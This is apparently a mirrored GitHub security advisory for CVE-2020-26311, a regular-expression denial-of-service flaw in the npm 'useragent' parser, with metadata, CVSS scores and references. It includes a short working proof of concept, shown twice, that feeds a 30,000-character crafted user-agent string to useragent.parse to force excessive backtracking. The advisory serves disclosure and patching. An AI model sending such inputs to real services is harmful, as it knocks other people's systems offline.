GHSA-MGFV-M47X-4WQP
Vulnerability from github – Published: 2024-10-26 21:30 – Updated: 2025-09-03 15:17
VLAI?
Summary
useragent Regular Expression Denial of Service vulnerability
Details
Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).
PoC
async function exploit() {
const useragent = require(\"useragent\");
// Create a malicious user-agent that leads to excessive backtracking
const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
// Parse the malicious user-agent
const agent = useragent.parse(maliciousUserAgent);
// Call the toString method to trigger the vulnerability
const result = await agent.device.toString();
console.log(result);
}
await exploit();
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "useragent"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-26311"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-28T15:01:50Z",
"nvd_published_at": "2024-10-26T21:15:14Z",
"severity": "MODERATE"
},
"details": "Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).\n\n## PoC\n```js\nasync function exploit() {\n const useragent = require(\\\"useragent\\\");\n\n // Create a malicious user-agent that leads to excessive backtracking\n const maliciousUserAgent = \u0027Mozilla/5.0 (\u0027 + \u0027X\u0027.repeat(30000) + \u0027) Gecko/20100101 Firefox/77.0\u0027;\n\n // Parse the malicious user-agent\n const agent = useragent.parse(maliciousUserAgent);\n\n // Call the toString method to trigger the vulnerability\n const result = await agent.device.toString();\n console.log(result);\n}\n\nawait exploit();\n```",
"id": "GHSA-mgfv-m47x-4wqp",
"modified": "2025-09-03T15:17:53Z",
"published": "2024-10-26T21:30:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26311"
},
{
"type": "WEB",
"url": "https://github.com/3rd-Eden/useragent/issues/167"
},
{
"type": "WEB",
"url": "https://github.com/3rd-Eden/useragent/commit/4c3ee79358bea72d88fe78ac98f4f861db40b89b"
},
{
"type": "PACKAGE",
"url": "https://github.com/3rd-Eden/useragent"
},
{
"type": "WEB",
"url": "https://github.com/3rd-Eden/useragent/blob/ffa906f923183c85fbb9e6c90f19345e2bd3c52a/lib/regexps.js#L5568"
},
{
"type": "ADVISORY",
"url": "https://securitylab.github.com/advisories/GHSL-2020-312-redos-useragent"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/U:Green",
"type": "CVSS_V4"
}
],
"summary": "useragent Regular Expression Denial of Service vulnerability"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…